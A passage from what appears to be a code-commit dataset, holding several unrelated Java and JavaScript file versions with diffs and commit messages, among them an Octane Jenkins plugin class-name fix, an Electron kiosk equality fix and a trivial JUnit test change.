0) / 100.0; weight = weight * weight * weight; // make more sensitive at low end currentModels[NUM_MODELS - 1] = synth.getModel(); // What were the best models before? 
int[] bestModels = new int[3]; for(int j = 0; j < 3; j++) bestModels[j] = -1; // load the best models for(int i = 0; i < NUM_MODELS; i++) { for(int j = 0; j < 3; j++) { if (ratings[i][j].isSelected()) bestModels[j] = i; } } // Compact if (bestModels[1] == -1) { bestModels[1] = bestModels[2]; bestModels[2] = -1; } if (bestModels[0] == -1) { bestModels[0] = bestModels[1]; bestModels[1] = bestModels[2]; bestModels[2] = -1; } if (bestModels[0] == -1) { again(); // nothing was selected as good, so we just do a retry } else if (bestModels[1] == -1) { pushStack(bestModels, new Model[] { currentModels[bestModels[0]], null, null }, getSelectedResults(), currentModels); produceNN(random, keys, weight, currentModels[bestModels[0]]); operation = OPERATION_CLIMB_NN; } else if (bestModels[2] == -1) { pushStack(bestModels, new Model[] { currentModels[bestModels[0]], currentModels[bestModels[1]], null }, getSelectedResults(), currentModels); produceNN(random, keys, weight, currentModels[bestModels[0]], currentModels[bestModels[1]]); operation = OPERATION_CLIMB_NN; } else { pushStack(bestModels, new Model[] { currentModels[bestModels[0]], currentModels[bestModels[1]], currentModels[bestModels[2]] }, getSelectedResults(), currentModels); produceNN(random, keys, weight, currentModels[bestModels[0]], currentModels[bestModels[1]], currentModels[bestModels[2]]); operation = OPERATION_CLIMB_NN; } iterations.setName("Iteration " + stack.size()); repaint(); ratings[NUM_MODELS][0].setSelected(true); ratings[NUM_MODELS][1].setSelected(true); ratings[NUM_MODELS][2].setSelected(true); for(int i = 0; i < NUM_CANDIDATES; i++) selected[i].setSelected(true); } }
bug fixes for Librarian
edisyn/HillClimb.java
bug fixes for Librarian
<ide><path>edisyn/HillClimb.java <ide> <ide> for(int i = 0; i < Math.min(len, 32); i++) <ide> { <del> currentModels[i] = (Model)(synth.librarian.getModel(row + i, column).clone()); <add> currentModels[i] = (Model)(synth.librarian.getLibrary().getModel(column - 1, row + i).clone()); <ide> } <ide> <ide> int m = len;
Java
apache-2.0
3457526688aabf35d35e160ae3ffdaddb6c22c38
0
mlvtito/padlock
package net.rwx.padlock.testapp; import static org.assertj.core.api.Assertions.assertThat; import org.junit.Test; /* * To change this license header, choose License Headers in Project Properties. * To change this template file, choose Tools | Templates * and open the template in the editor. */ /** * * @author Arnaud Fonce <[email protected]> */ public class SimpleIT { @Test public void should_BlaBlaBlaBlaBlaBlaBlaBlaBlaBla() { assertThat(false).isFalse(); } }
test/src/test/java/net/rwx/padlock/testapp/SimpleIT.java
package net.rwx.padlock.testapp; import static org.assertj.core.api.Assertions.assertThat; import org.junit.Test; /* * To change this license header, choose License Headers in Project Properties. * To change this template file, choose Tools | Templates * and open the template in the editor. */ /** * * @author Arnaud Fonce <[email protected]> */ public class SimpleIT { @Test public void should_BlaBlaBlaBlaBlaBlaBlaBlaBlaBla() { assertThat(true).isFalse(); } }
integration test with success
test/src/test/java/net/rwx/padlock/testapp/SimpleIT.java
integration test with success
<ide><path>test/src/test/java/net/rwx/padlock/testapp/SimpleIT.java <ide> <ide> @Test <ide> public void should_BlaBlaBlaBlaBlaBlaBlaBlaBlaBla() { <del> assertThat(true).isFalse(); <add> assertThat(false).isFalse(); <ide> } <ide> }
Java
mit
103114d8d4607594863e3edf06f76a68c3615314
0
HPSoftware/hpaa-octane-dev,HPSoftware/hpaa-octane-dev,HPSoftware/hpaa-octane-dev,HPSoftware/hpaa-octane-dev,HPSoftware/hpaa-octane-dev
/* * Certain versions of software and/or documents ("Material") accessible here may contain branding from * Hewlett-Packard Company (now HP Inc.) and Hewlett Packard Enterprise Company. As of September 1, 2017, * the Material is now offered by Micro Focus, a separately owned and operated company. Any reference to the HP * and Hewlett Packard Enterprise/HPE marks is historical in nature, and the HP and Hewlett Packard Enterprise/HPE * marks are the property of their respective owners. * __________________________________________________________________ * MIT License * * (c) Copyright 2012-2019 Micro Focus or one of its affiliates. * * The only warranties for products and services of Micro Focus and its affiliates * and licensors ("Micro Focus") are set forth in the express warranty statements * accompanying such products and services. Nothing herein should be construed as * constituting an additional warranty. Micro Focus shall not be liable for technical * or editorial errors or omissions contained herein. * The information contained herein is subject to change without notice. * ___________________________________________________________________ */ package com.microfocus.application.automation.tools.octane.model; import com.hp.octane.integrations.dto.DTOFactory; import com.hp.octane.integrations.dto.causes.CIEventCause; import com.hp.octane.integrations.dto.causes.CIEventCauseType; import com.microfocus.application.automation.tools.octane.configuration.SDKBasedLoggerProvider; import com.microfocus.application.automation.tools.octane.model.processors.projects.JobProcessorFactory; import com.microfocus.application.automation.tools.octane.tests.build.BuildHandlerUtils; import hudson.model.Cause; import hudson.model.InvisibleAction; import hudson.model.Run; import hudson.triggers.SCMTrigger; import hudson.triggers.TimerTrigger; import org.apache.logging.log4j.Logger; import org.jenkinsci.plugins.workflow.actions.LabelAction; import org.jenkinsci.plugins.workflow.cps.nodes.StepAtomNode; import org.jenkinsci.plugins.workflow.cps.nodes.StepEndNode; import org.jenkinsci.plugins.workflow.graph.FlowNode; import org.jenkinsci.plugins.workflow.job.WorkflowRun; import org.jenkinsci.plugins.workflow.steps.StepDescriptor; import java.io.IOException; import java.util.LinkedHashSet; import java.util.LinkedList; import java.util.List; import java.util.Set; /** * Causes Factory is a collection of static stateless methods to extract/traverse/transform causes chains of the runs * User: gullery * Date: 20/10/14 */ public final class CIEventCausesFactory { private static final Logger logger = SDKBasedLoggerProvider.getLogger(CIEventCausesFactory.class); private static final DTOFactory dtoFactory = DTOFactory.getInstance(); private CIEventCausesFactory() { } public static List<CIEventCause> processCauses(Run<?, ?> run) { if (run == null) { throw new IllegalArgumentException("run MUST NOT be null"); } List<CIEventCause> result = new LinkedList<>(); List<Cause> causes = run.getCauses(); CIEventCause tmpResultCause; Cause.UserIdCause tmpUserCause; Cause.UpstreamCause tmpUpstreamCause; for (Cause cause : causes) { tmpResultCause = dtoFactory.newDTO(CIEventCause.class); if (cause instanceof SCMTrigger.SCMTriggerCause) { tmpResultCause.setType(CIEventCauseType.SCM); result.add(tmpResultCause); } else if (cause instanceof TimerTrigger.TimerTriggerCause) { tmpResultCause.setType(CIEventCauseType.TIMER); result.add(tmpResultCause); } else if (cause instanceof Cause.UserIdCause) { tmpUserCause = (Cause.UserIdCause) cause; 
tmpResultCause.setType(CIEventCauseType.USER); tmpResultCause.setUser(tmpUserCause.getUserId()); result.add(tmpResultCause); } else if (cause instanceof Cause.RemoteCause) { // TODO: add support to remove cause execution in SDK/DTOs tmpResultCause.setType(CIEventCauseType.UNDEFINED); result.add(tmpResultCause); } else if (cause instanceof Cause.UpstreamCause) { tmpUpstreamCause = (Cause.UpstreamCause) cause; boolean succeededToBuildFlowCauses = false; Run upstreamRun = tmpUpstreamCause.getUpstreamRun(); if (upstreamRun != null && JobProcessorFactory.WORKFLOW_RUN_NAME.equals(upstreamRun.getClass().getName())) { // for the child of the Workflow - break aside and calculate the causes chain of the stages WorkflowRun rootWFRun = (WorkflowRun) upstreamRun; if (rootWFRun.getExecution() != null && rootWFRun.getExecution().getCurrentHeads() != null) { FlowNode enclosingNode = lookupJobEnclosingNode(run, rootWFRun); if (enclosingNode != null) { List<CIEventCause> flowCauses = processCauses(enclosingNode); result.addAll(flowCauses); succeededToBuildFlowCauses = true; } } } if (!succeededToBuildFlowCauses) { // proceed with regular UPSTREAM calculation logic as usual tmpResultCause.setType(CIEventCauseType.UPSTREAM); tmpResultCause.setProject(resolveJobCiId(tmpUpstreamCause.getUpstreamProject())); tmpResultCause.setBuildCiId(String.valueOf(tmpUpstreamCause.getUpstreamBuild())); tmpResultCause.setCauses(processCauses(upstreamRun)); result.add(tmpResultCause); } } else { tmpResultCause.setType(CIEventCauseType.UNDEFINED); result.add(tmpResultCause); } } return result; } public static List<CIEventCause> processCauses(FlowNode flowNode) { List<CIEventCause> causes = new LinkedList<>(); processCauses(flowNode, causes, new LinkedHashSet<>()); return causes; } private static void processCauses(FlowNode flowNode, List<CIEventCause> causes, Set<FlowNode> startStagesToSkip) { // we reached the start of the flow - add WorkflowRun as an initial UPSTREAM cause if (flowNode.getParents().isEmpty()) { WorkflowRun parentRun = BuildHandlerUtils.extractParentRun(flowNode); CIEventCause cause = dtoFactory.newDTO(CIEventCause.class) .setType(CIEventCauseType.UPSTREAM) .setProject(BuildHandlerUtils.getJobCiId(parentRun)) .setBuildCiId(BuildHandlerUtils.getBuildCiId(parentRun)) .setCauses(CIEventCausesFactory.processCauses((parentRun))); causes.add(cause); } // if we are calculating causes for the END STEP - exclude it's own START STEP from calculation if (BuildHandlerUtils.isStageEndNode(flowNode)) { startStagesToSkip.add(((StepEndNode) flowNode).getStartNode()); } for (FlowNode parent : flowNode.getParents()) { if (BuildHandlerUtils.isStageEndNode(parent)) { startStagesToSkip.add(((StepEndNode) parent).getStartNode()); processCauses(parent, causes, startStagesToSkip); } else if (BuildHandlerUtils.isStageStartNode(parent)) { if (!startStagesToSkip.contains(parent)) { CIEventCause cause = dtoFactory.newDTO(CIEventCause.class) .setType(CIEventCauseType.UPSTREAM) .setProject(parent.getDisplayName()) .setBuildCiId(String.valueOf(BuildHandlerUtils.extractParentRun(parent).getNumber())); causes.add(cause); processCauses(parent, cause.getCauses(), startStagesToSkip); } else { startStagesToSkip.remove(parent); processCauses(parent, causes, startStagesToSkip); } } else { processCauses(parent, causes, startStagesToSkip); } } } private static String resolveJobCiId(String jobPlainName) { if (!jobPlainName.contains(",")) { return BuildHandlerUtils.translateFolderJobName(jobPlainName); } return jobPlainName; } private static FlowNode 
lookupJobEnclosingNode(Run targetRun, WorkflowRun parentRun) { if (parentRun.getExecution() == null) { return null; } FlowNode result = null; OctaneParentNodeAction octaneParentNodeAction = targetRun.getAction(OctaneParentNodeAction.class); if (octaneParentNodeAction != null) { // finished event case - we do expect an action OctaneParentNodeAction to be present with the relevant info try { result = parentRun.getExecution().getNode(octaneParentNodeAction.parentFlowNodeId); } catch (IOException ioe) { logger.error("failed to extract parent flow node for " + targetRun, ioe); } } else { // started event case - we expect a strict bond here since the parent FlowNode MUST be among the current heads // the only case for potential break here is if the same JOB will be running concurrently by 2 distinct FlowNodes List<FlowNode> potentialAncestors = parentRun.getExecution().getCurrentHeads(); if (potentialAncestors != null) { for (FlowNode head : potentialAncestors) { if (head instanceof StepAtomNode && head.getAction(LabelAction.class) != null) { StepDescriptor descriptor = ((StepAtomNode) head).getDescriptor(); LabelAction labelAction = head.getAction(LabelAction.class); String label = labelAction != null ? labelAction.getDisplayName() : null; if (descriptor != null && descriptor.getId().endsWith("BuildTriggerStep") && label != null && label.endsWith(targetRun.getParent().getFullDisplayName())) { result = head; targetRun.addAction(new OctaneParentNodeAction(result.getId())); break; } } } } } return result; } private final static class OctaneParentNodeAction extends InvisibleAction { private final String parentFlowNodeId; private OctaneParentNodeAction(String parentFlowNodeId) { this.parentFlowNodeId = parentFlowNodeId; } } }
src/main/java/com/microfocus/application/automation/tools/octane/model/CIEventCausesFactory.java
/* * Certain versions of software and/or documents ("Material") accessible here may contain branding from * Hewlett-Packard Company (now HP Inc.) and Hewlett Packard Enterprise Company. As of September 1, 2017, * the Material is now offered by Micro Focus, a separately owned and operated company. Any reference to the HP * and Hewlett Packard Enterprise/HPE marks is historical in nature, and the HP and Hewlett Packard Enterprise/HPE * marks are the property of their respective owners. * __________________________________________________________________ * MIT License * * (c) Copyright 2012-2019 Micro Focus or one of its affiliates. * * The only warranties for products and services of Micro Focus and its affiliates * and licensors ("Micro Focus") are set forth in the express warranty statements * accompanying such products and services. Nothing herein should be construed as * constituting an additional warranty. Micro Focus shall not be liable for technical * or editorial errors or omissions contained herein. * The information contained herein is subject to change without notice. * ___________________________________________________________________ */ package com.microfocus.application.automation.tools.octane.model; import com.hp.octane.integrations.dto.DTOFactory; import com.hp.octane.integrations.dto.causes.CIEventCause; import com.hp.octane.integrations.dto.causes.CIEventCauseType; import com.microfocus.application.automation.tools.octane.configuration.SDKBasedLoggerProvider; import com.microfocus.application.automation.tools.octane.model.processors.projects.JobProcessorFactory; import com.microfocus.application.automation.tools.octane.tests.build.BuildHandlerUtils; import hudson.model.Cause; import hudson.model.InvisibleAction; import hudson.model.Run; import hudson.triggers.SCMTrigger; import hudson.triggers.TimerTrigger; import org.apache.logging.log4j.Logger; import org.jenkinsci.plugins.workflow.actions.LabelAction; import org.jenkinsci.plugins.workflow.cps.nodes.StepAtomNode; import org.jenkinsci.plugins.workflow.cps.nodes.StepEndNode; import org.jenkinsci.plugins.workflow.graph.FlowNode; import org.jenkinsci.plugins.workflow.job.WorkflowRun; import org.jenkinsci.plugins.workflow.steps.StepDescriptor; import java.io.IOException; import java.util.LinkedHashSet; import java.util.LinkedList; import java.util.List; import java.util.Set; /** * Causes Factory is a collection of static stateless methods to extract/traverse/transform causes chains of the runs * User: gullery * Date: 20/10/14 */ public final class CIEventCausesFactory { private static final Logger logger = SDKBasedLoggerProvider.getLogger(CIEventCausesFactory.class); private static final DTOFactory dtoFactory = DTOFactory.getInstance(); private CIEventCausesFactory() { } public static List<CIEventCause> processCauses(Run<?, ?> run) { if (run == null) { throw new IllegalArgumentException("run MUST NOT be null"); } List<CIEventCause> result = new LinkedList<>(); List<Cause> causes = run.getCauses(); CIEventCause tmpResultCause; Cause.UserIdCause tmpUserCause; Cause.UpstreamCause tmpUpstreamCause; for (Cause cause : causes) { tmpResultCause = dtoFactory.newDTO(CIEventCause.class); if (cause instanceof SCMTrigger.SCMTriggerCause) { tmpResultCause.setType(CIEventCauseType.SCM); result.add(tmpResultCause); } else if (cause instanceof TimerTrigger.TimerTriggerCause) { tmpResultCause.setType(CIEventCauseType.TIMER); result.add(tmpResultCause); } else if (cause instanceof Cause.UserIdCause) { tmpUserCause = (Cause.UserIdCause) cause; 
tmpResultCause.setType(CIEventCauseType.USER); tmpResultCause.setUser(tmpUserCause.getUserId()); result.add(tmpResultCause); } else if (cause instanceof Cause.RemoteCause) { // TODO: add support to remove cause execution in SDK/DTOs tmpResultCause.setType(CIEventCauseType.UNDEFINED); result.add(tmpResultCause); } else if (cause instanceof Cause.UpstreamCause) { tmpUpstreamCause = (Cause.UpstreamCause) cause; boolean succeededToBuildFlowCauses = false; Run upstreamRun = tmpUpstreamCause.getUpstreamRun(); if (upstreamRun != null && JobProcessorFactory.WORKFLOW_RUN_NAME.equals(upstreamRun.getClass().getSimpleName())) { // for the child of the Workflow - break aside and calculate the causes chain of the stages WorkflowRun rootWFRun = (WorkflowRun) upstreamRun; if (rootWFRun.getExecution() != null && rootWFRun.getExecution().getCurrentHeads() != null) { FlowNode enclosingNode = lookupJobEnclosingNode(run, rootWFRun); if (enclosingNode != null) { List<CIEventCause> flowCauses = processCauses(enclosingNode); result.addAll(flowCauses); succeededToBuildFlowCauses = true; } } } if (!succeededToBuildFlowCauses) { // proceed with regular UPSTREAM calculation logic as usual tmpResultCause.setType(CIEventCauseType.UPSTREAM); tmpResultCause.setProject(resolveJobCiId(tmpUpstreamCause.getUpstreamProject())); tmpResultCause.setBuildCiId(String.valueOf(tmpUpstreamCause.getUpstreamBuild())); tmpResultCause.setCauses(processCauses(upstreamRun)); result.add(tmpResultCause); } } else { tmpResultCause.setType(CIEventCauseType.UNDEFINED); result.add(tmpResultCause); } } return result; } public static List<CIEventCause> processCauses(FlowNode flowNode) { List<CIEventCause> causes = new LinkedList<>(); processCauses(flowNode, causes, new LinkedHashSet<>()); return causes; } private static void processCauses(FlowNode flowNode, List<CIEventCause> causes, Set<FlowNode> startStagesToSkip) { // we reached the start of the flow - add WorkflowRun as an initial UPSTREAM cause if (flowNode.getParents().isEmpty()) { WorkflowRun parentRun = BuildHandlerUtils.extractParentRun(flowNode); CIEventCause cause = dtoFactory.newDTO(CIEventCause.class) .setType(CIEventCauseType.UPSTREAM) .setProject(BuildHandlerUtils.getJobCiId(parentRun)) .setBuildCiId(BuildHandlerUtils.getBuildCiId(parentRun)) .setCauses(CIEventCausesFactory.processCauses((parentRun))); causes.add(cause); } // if we are calculating causes for the END STEP - exclude it's own START STEP from calculation if (BuildHandlerUtils.isStageEndNode(flowNode)) { startStagesToSkip.add(((StepEndNode) flowNode).getStartNode()); } for (FlowNode parent : flowNode.getParents()) { if (BuildHandlerUtils.isStageEndNode(parent)) { startStagesToSkip.add(((StepEndNode) parent).getStartNode()); processCauses(parent, causes, startStagesToSkip); } else if (BuildHandlerUtils.isStageStartNode(parent)) { if (!startStagesToSkip.contains(parent)) { CIEventCause cause = dtoFactory.newDTO(CIEventCause.class) .setType(CIEventCauseType.UPSTREAM) .setProject(parent.getDisplayName()) .setBuildCiId(String.valueOf(BuildHandlerUtils.extractParentRun(parent).getNumber())); causes.add(cause); processCauses(parent, cause.getCauses(), startStagesToSkip); } else { startStagesToSkip.remove(parent); processCauses(parent, causes, startStagesToSkip); } } else { processCauses(parent, causes, startStagesToSkip); } } } private static String resolveJobCiId(String jobPlainName) { if (!jobPlainName.contains(",")) { return BuildHandlerUtils.translateFolderJobName(jobPlainName); } return jobPlainName; } private static 
FlowNode lookupJobEnclosingNode(Run targetRun, WorkflowRun parentRun) { if (parentRun.getExecution() == null) { return null; } FlowNode result = null; OctaneParentNodeAction octaneParentNodeAction = targetRun.getAction(OctaneParentNodeAction.class); if (octaneParentNodeAction != null) { // finished event case - we do expect an action OctaneParentNodeAction to be present with the relevant info try { result = parentRun.getExecution().getNode(octaneParentNodeAction.parentFlowNodeId); } catch (IOException ioe) { logger.error("failed to extract parent flow node for " + targetRun, ioe); } } else { // started event case - we expect a strict bond here since the parent FlowNode MUST be among the current heads // the only case for potential break here is if the same JOB will be running concurrently by 2 distinct FlowNodes List<FlowNode> potentialAncestors = parentRun.getExecution().getCurrentHeads(); if (potentialAncestors != null) { for (FlowNode head : potentialAncestors) { if (head instanceof StepAtomNode && head.getAction(LabelAction.class) != null) { StepDescriptor descriptor = ((StepAtomNode) head).getDescriptor(); LabelAction labelAction = head.getAction(LabelAction.class); String label = labelAction != null ? labelAction.getDisplayName() : null; if (descriptor != null && descriptor.getId().endsWith("BuildTriggerStep") && label != null && label.endsWith(targetRun.getParent().getFullDisplayName())) { result = head; targetRun.addAction(new OctaneParentNodeAction(result.getId())); break; } } } } } return result; } private final static class OctaneParentNodeAction extends InvisibleAction { private final String parentFlowNodeId; private OctaneParentNodeAction(String parentFlowNodeId) { this.parentFlowNodeId = parentFlowNodeId; } } }
tech : fix for computing workflowJob
src/main/java/com/microfocus/application/automation/tools/octane/model/CIEventCausesFactory.java
tech : fix for computing workflowJob
<ide><path>rc/main/java/com/microfocus/application/automation/tools/octane/model/CIEventCausesFactory.java <ide> <ide> boolean succeededToBuildFlowCauses = false; <ide> Run upstreamRun = tmpUpstreamCause.getUpstreamRun(); <del> if (upstreamRun != null && JobProcessorFactory.WORKFLOW_RUN_NAME.equals(upstreamRun.getClass().getSimpleName())) { <add> if (upstreamRun != null && JobProcessorFactory.WORKFLOW_RUN_NAME.equals(upstreamRun.getClass().getName())) { <ide> <ide> // for the child of the Workflow - break aside and calculate the causes chain of the stages <ide> WorkflowRun rootWFRun = (WorkflowRun) upstreamRun;
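A minimal sketch of why this record's one-line change matters, assuming JobProcessorFactory.WORKFLOW_RUN_NAME holds a fully qualified class name (the constant's actual value is not shown in this record, so a stand-in is used): Class.getSimpleName() drops the package prefix, so comparing it against a package-qualified constant can never match, while getClass().getName() returns the qualified form and can.

// Illustration only, not part of the record above. WORKFLOW_RUN_NAME here is a
// hypothetical stand-in for JobProcessorFactory.WORKFLOW_RUN_NAME.
public class ClassNameComparisonDemo {
	private static final String WORKFLOW_RUN_NAME = "java.lang.StringBuilder"; // assumed fully qualified value

	public static void main(String[] args) {
		Object upstreamRun = new StringBuilder(); // stand-in for the upstream Run instance
		System.out.println(upstreamRun.getClass().getSimpleName()); // StringBuilder
		System.out.println(upstreamRun.getClass().getName());       // java.lang.StringBuilder
		// old check: a simple name never equals a package-qualified constant
		System.out.println(WORKFLOW_RUN_NAME.equals(upstreamRun.getClass().getSimpleName())); // false
		// fixed check: fully qualified names match
		System.out.println(WORKFLOW_RUN_NAME.equals(upstreamRun.getClass().getName()));       // true
	}
}

With the old comparison the upstream WorkflowRun branch was unreachable, so the stage-level causes chain was never built and the code always fell back to the generic UPSTREAM cause.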
JavaScript
mit
2a334de6d16fa014ed0337cd81a572af163d1530
0
scimusmn/electron-wrapper,scimusmn/electron-wrapper
// // Background // // This is main Electron process, started first thing when your app launches. // This script runs through entire life of your application. It doesn't have // any windows that you can see on screen, but we can open windows from here. // import jetpack from 'fs-jetpack'; // Base electron modules import { app, BrowserWindow, globalShortcut } from 'electron'; let childProcess = require('child_process'); let promisedExec = childProcess.exec; // Development helper for showing Chromium Dev Tools import devHelper from './vendor/electron_boilerplate/dev_helper'; // Special module holding environment variables which you declared // in config/env_xxx.json file. import env from './env'; import os from 'os'; let mainWindow; app.on('ready', function () { mainWindow = new BrowserWindow({ x: 0, y: 0, width: 800, height: 600, }); // // Hack to make full-screen kiosk mode actually work. // // There is an active bug with Electron, kiosk mode, and Yosemite. // https://github.com/atom/electron/issues/1054 // This hack makes kiosk mode actually work by waiting for the app to launch // and then issuing a call to go into kiosk mode after a few milliseconds. // if (env.name === 'production') { setTimeout(function () { mainWindow.setKiosk(true); }, 100); } // // Show dev tools when we're not in production mode // if (env.name !== 'production') { devHelper.setDevMenu(); mainWindow.openDevTools(); } // // Open the app // console.log(`This platform is ${process.platform}`); if (env.name === 'test') { mainWindow.loadURL('file://' + __dirname + '/spec.html'); } else { var configFile = ''; switch (process.platform) { case 'win32': { configFile = '/usr/local/etc/kiosk/config.json'; break; } case 'darwin': { configFile = '/usr/local/etc/kiosk/config.json'; break; } default: { configFile = '/usr/local/etc/kiosk/config.json'; } } loadWindowConfigFile(configFile); } // // Keyboard shortcuts // // Ctrl or Command + f will switch you to the Finder. // We use the "switch to Finder" approach instead of a quit, because in most // of our Electron setups we have a launchd process that will relaunch the // app on quit. For maintenance, we probably just need to be able to get // to the Finder while the application remains running in the background. 
// const retQuit = globalShortcut.register('CommandOrControl+F', () => { console.log('Switching to Finder'); promisedExec('open -a Finder'); }); if (!retQuit) { console.log('Quit keyboard registration failed'); } const retReload = globalShortcut.register('CommandOrControl+R', () => { console.log('Reload the page'); mainWindow.reload(); }); if (!retReload) { console.log('Reload keyboard registration failed'); } }); function loadWindowConfigFile(configFile) { const configFileObj = jetpack.read(configFile, 'json'); console.log('configFileObj: ', configFileObj); if (configFileObj !== null) { loadWindowUptimeDelay(configFileObj); } else { console.log('Config file [' + configFile + '] not present.'); mainWindow.loadURL('file://' + __dirname + '/config-error.html'); } } function loadWindowUptimeDelay(configFileObj) { // Seconds since launch, when it will be safe to load the URL const nominalUptime = 300; // Seconds to wait if we are not in the nominal uptime window const launchDelay = 60; console.log('os.uptime(): ', os.uptime()); console.log('nominalUptime: ', nominalUptime); if (os.uptime() > nominalUptime) { console.log('Launching immediately'); mainWindow.loadURL(configFileObj.url); } else { console.log('Delaying launch ' + launchDelay + ' seconds'); mainWindow.loadURL('file://' + __dirname + '/launch-delay.html'); setTimeout(function () { mainWindow.loadURL(configFileObj.url); }, launchDelay * 1000); } } app.on('window-all-closed', function () { app.quit(); });
app/background.js
// // Background // // This is main Electron process, started first thing when your app launches. // This script runs through entire life of your application. It doesn't have // any windows that you can see on screen, but we can open windows from here. // import jetpack from 'fs-jetpack'; // Base electron modules import { app, BrowserWindow, globalShortcut } from 'electron'; let childProcess = require('child_process'); let promisedExec = childProcess.exec; // Development helper for showing Chromium Dev Tools import devHelper from './vendor/electron_boilerplate/dev_helper'; // Special module holding environment variables which you declared // in config/env_xxx.json file. import env from './env'; import os from 'os'; let mainWindow; app.on('ready', function () { mainWindow = new BrowserWindow({ x: 0, y: 0, width: 800, height: 600, }); // // Hack to make full-screen kiosk mode actually work. // // There is an active bug with Electron, kiosk mode, and Yosemite. // https://github.com/atom/electron/issues/1054 // This hack makes kiosk mode actually work by waiting for the app to launch // and then issuing a call to go into kiosk mode after a few milliseconds. // if (env.name == 'production') { setTimeout(function () { mainWindow.setKiosk(true); }, 100); } // // Show dev tools when we're not in production mode // if (env.name !== 'production') { devHelper.setDevMenu(); mainWindow.openDevTools(); } // // Open the app // console.log(`This platform is ${process.platform}`); if (env.name === 'test') { mainWindow.loadURL('file://' + __dirname + '/spec.html'); } else { var configFile = ''; switch (process.platform) { case 'win32': { configFile = '/usr/local/etc/kiosk/config.json'; break; } case 'darwin': { configFile = '/usr/local/etc/kiosk/config.json'; break; } default: { configFile = '/usr/local/etc/kiosk/config.json'; } } loadWindowConfigFile(configFile); } // // Keyboard shortcuts // // Ctrl or Command + f will switch you to the Finder. // We use the "switch to Finder" approach instead of a quit, because in most // of our Electron setups we have a launchd process that will relaunch the // app on quit. For maintenance, we probably just need to be able to get // to the Finder while the application remains running in the background. 
// const retQuit = globalShortcut.register('CommandOrControl+F', () => { console.log('Switching to Finder'); promisedExec('open -a Finder'); }); if (!retQuit) { console.log('Quit keyboard registration failed'); } const retReload = globalShortcut.register('CommandOrControl+R', () => { console.log('Reload the page'); mainWindow.reload(); }); if (!retReload) { console.log('Reload keyboard registration failed'); } }); function loadWindowConfigFile(configFile) { const configFileObj = jetpack.read(configFile, 'json'); console.log('configFileObj: ', configFileObj); if (configFileObj !== null) { loadWindowUptimeDelay(configFileObj); } else { console.log('Config file [' + configFile + '] not present.'); mainWindow.loadURL('file://' + __dirname + '/config-error.html'); } } function loadWindowUptimeDelay(configFileObj) { // Seconds since launch, when it will be safe to load the URL const nominalUptime = 300; // Seconds to wait if we are not in the nominal uptime window const launchDelay = 60; console.log('os.uptime(): ', os.uptime()); console.log('nominalUptime: ', nominalUptime); if (os.uptime() > nominalUptime) { console.log('Launching immediately'); mainWindow.loadURL(configFileObj.url); } else { console.log('Delaying launch ' + launchDelay + ' seconds'); mainWindow.loadURL('file://' + __dirname + '/launch-delay.html'); setTimeout(function () { mainWindow.loadURL(configFileObj.url); }, launchDelay * 1000); } } app.on('window-all-closed', function () { app.quit(); });
Prevent unintended type coercion
app/background.js
Prevent unintended type coercion
<ide><path>pp/background.js <ide> // This hack makes kiosk mode actually work by waiting for the app to launch <ide> // and then issuing a call to go into kiosk mode after a few milliseconds. <ide> // <del> if (env.name == 'production') { <add> if (env.name === 'production') { <ide> setTimeout(function () { <ide> mainWindow.setKiosk(true); <ide> }, 100);
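The diff in this record only swaps loose equality (==, which coerces operand types in JavaScript) for strict equality (===) on env.name, so kiosk mode is enabled only on an exact string match. The other piece of logic in app/background.js, the uptime gate in loadWindowUptimeDelay, is re-expressed below in Java purely as a cross-language illustration; the class and method names are hypothetical, and the thresholds mirror the constants in the record (300 seconds of nominal uptime, 60 seconds of launch delay).

// Cross-language sketch of the uptime gate from loadWindowUptimeDelay; all names are hypothetical.
public class LaunchDelayDemo {
	private static final long NOMINAL_UPTIME_SECONDS = 300; // load immediately once the machine has been up this long
	private static final long LAUNCH_DELAY_SECONDS = 60;    // otherwise show the delay page and wait this long

	/** Returns how many seconds to wait before loading the kiosk URL. */
	static long secondsToWait(long uptimeSeconds) {
		return uptimeSeconds > NOMINAL_UPTIME_SECONDS ? 0 : LAUNCH_DELAY_SECONDS;
	}

	public static void main(String[] args) {
		System.out.println(secondsToWait(600)); // 0  - machine has been up long enough
		System.out.println(secondsToWait(30));  // 60 - fresh boot, delay the launch
	}
}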
Java
agpl-3.0
d51b676ae594e9982e6cee337c58de5a3098fa0c
0
o2oa/o2oa,o2oa/o2oa,o2oa/o2oa,o2oa/o2oa,o2oa/o2oa
package com.x.processplatform.service.processing.processor.manual; import java.util.ArrayList; import java.util.Calendar; import java.util.Comparator; import java.util.Date; import java.util.LinkedHashMap; import java.util.List; import java.util.Map; import java.util.Map.Entry; import java.util.Objects; import java.util.Optional; import java.util.stream.Collectors; import javax.script.Bindings; import javax.script.ScriptContext; import org.apache.commons.collections4.ListUtils; import org.apache.commons.lang3.BooleanUtils; import org.apache.commons.lang3.ObjectUtils; import org.apache.commons.lang3.StringUtils; import org.apache.commons.lang3.time.DateUtils; import com.x.base.core.container.EntityManagerContainer; import com.x.base.core.entity.JpaObject; import com.x.base.core.project.config.Config; import com.x.base.core.project.logger.Logger; import com.x.base.core.project.logger.LoggerFactory; import com.x.base.core.project.organization.EmpowerLog; import com.x.base.core.project.script.ScriptFactory; import com.x.base.core.project.tools.DateTools; import com.x.base.core.project.tools.ListTools; import com.x.base.core.project.tools.NumberTools; import com.x.base.core.project.utils.time.WorkTime; import com.x.processplatform.core.entity.content.Read; import com.x.processplatform.core.entity.content.Task; import com.x.processplatform.core.entity.content.TaskCompleted; import com.x.processplatform.core.entity.content.Work; import com.x.processplatform.core.entity.content.WorkLog; import com.x.processplatform.core.entity.element.ActivityType; import com.x.processplatform.core.entity.element.Manual; import com.x.processplatform.core.entity.element.Route; import com.x.processplatform.core.entity.element.util.WorkLogTree; import com.x.processplatform.core.entity.element.util.WorkLogTree.Node; import com.x.processplatform.core.entity.log.Signal; import com.x.processplatform.service.processing.Business; import com.x.processplatform.service.processing.processor.AeiObjects; /** * @author Zhou Rui */ public class ManualProcessor extends AbstractManualProcessor { private static Logger logger = LoggerFactory.getLogger(ManualProcessor.class); public ManualProcessor(EntityManagerContainer entityManagerContainer) throws Exception { super(entityManagerContainer); } @Override protected Work arriving(AeiObjects aeiObjects, Manual manual) throws Exception { // 发送ProcessingSignal aeiObjects.getProcessingAttributes().push(Signal.manualArrive(aeiObjects.getWork().getActivityToken(), manual)); // 根据manual计算出来的活动处理人 List<String> identities = calculateTaskIdentities(aeiObjects, manual); // 启用同类工作相同活动节点合并,如果有合并的工作,那么直接返回这个工作. 
